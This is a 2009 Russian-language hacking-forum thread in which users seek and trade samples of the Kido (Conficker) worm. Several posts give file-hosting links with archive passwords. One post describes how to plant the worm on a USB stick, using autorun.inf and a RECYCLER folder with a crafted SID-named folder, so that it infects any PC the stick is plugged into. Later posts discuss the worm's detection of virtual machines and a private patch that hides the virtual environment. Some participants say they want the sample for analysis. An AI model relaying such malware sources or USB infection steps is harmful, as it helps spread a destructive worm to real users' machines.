Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   Разыскиваю вирус kido (https://forum.antichat.xyz/showthread.php?t=108436)

neprovad 28.02.2009 08:32
Разыскиваю вирус kido
 
Сабж, ищу данный вирус. Если у кого есть, поделитесь, а то сам найти все не могу :(

MaZaHaKer 28.02.2009 09:02
sxijql.dll - Kido.ih
161 кб
Качать тут : http://www.sendspace.com/file/cqyzsu , пароль : antichat

http://www.virustotal.com/ru/analisis/f578a6c9894fd7c2dc7799f7330b3b18
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=21782790

neprovad 28.02.2009 11:34
перезалей пожалуйста, скачать не удается
Код:
The download link has been updated (error: #12).
You may now download the file.
и не получается скачать, редиректит бесконечно

MaZaHaKer 28.02.2009 18:27
странно у меня все нормально ... ладно перезалил :)

http://www.axifile.com/?1364946
http://www.rapidshare.ru/944781
http://www.filefactory.com/file/af2725f/n/1_rar
http://up-file.com/download/9616002cff4ab862f7c4712ad1c1d1dac


пароль тот же : antichat

neprovad 28.02.2009 18:42
Тему можно закрыть, сабж получен, всем спасибо)

nester 06.05.2009 09:32
разыскиваю вирус Kido для самостоятельного анализа
 
Не один день разыскиваю вирус Kido. Хотелось бы глянуть за его сетевой активностью. Однако все пришедшие мне с флэшками образцы почему-то не размножались. Все найденное на Malwaresearch.com при запуске выдавало сообщение “программа не умещается в памяти”. Честно сознаюсь, dll найденную в этом разделе пока никак не могу запустить. Просто исполняемый файлик есть?

Karantin 06.05.2009 11:57
http://rapidshare.com/files/186243825/danger.zip
password: infected
Put autorun.inf file on a USB stick. Then create a folder named "RECYCLER" on USB stick.
Then create another foilder named "S-5-3-42-2819952290-8240758988-879315005-3665" inside this RECYCLER folder.
U r ready to go. Plugin this USB device to any PC and click on it. Do it on ur own risk.

Not Found... 06.05.2009 12:02
Цитата:
Сообщение от Karantin
http://rapidshare.com/files/186243825/danger.zip
password: infected
Put autorun.inf file on a USB stick. Then create a folder named "RECYCLER" on USB stick.
Then create another foilder named "S-5-3-42-2819952290-8240758988-879315005-3665" inside this RECYCLER folder.
U r ready to go. Plugin this USB device to any PC and click on it. Do it on ur own risk.
+1...давно её искал..Kido всмысле)

nester 06.05.2009 15:42
Заразил виртуалку XP SP2. По началу ProcMon показал активность и все, тишина. Ни на флешки, ни по сети дальше не ползет. Может его надо еще и спровоцировать или таймбомб уже дезактивирован?!

LEE_ROY 06.05.2009 15:57
может у него детект вмваре всеголиш? ;)

nester 06.05.2009 17:37
Мысль интересная! Пробовал запустить без ухищрений виртуализации, тоже пока тихо. Без признаков жизни :)

dessametr 06.05.2009 19:16
перезалейте на ifolder или letibit

nester 07.05.2009 10:16
http://ifolder.ru/11992594

dessametr 08.05.2009 19:07
Спасибо что залил,а как им пользоваться?Просто отсылать на комп?

nester 12.05.2009 09:48
Для активации необходимо распаковать архив на флэшку и подмонтировать в windows xp.

043nKRuT0y 12.05.2009 10:00
Цитата:
Сообщение от LEE_ROY
может у него детект вмваре всеголиш? ;)
Да не только ВМВары ! Он распознает любую виртуальную среду и эмуляторы, защищаясь от отладки ;) Не пионеры всетаки вирус писали =)

Гдето был пост мол на Вару есть патчи или еще чтото что прикрывает виртуальную среду ! Точно не помню.... даже на ачате был топик ! Точно помню одно - патчик этот приват , найти не просто !!!

nester 12.05.2009 12:17
Ценная информация! Спасибо! Будем значит искать патчик...

xismyname 12.05.2009 12:54
Интересно, а .exe даннго червя у кого нибудь есть ? Если да, залейте куда нибудь плз...


Время: 10:56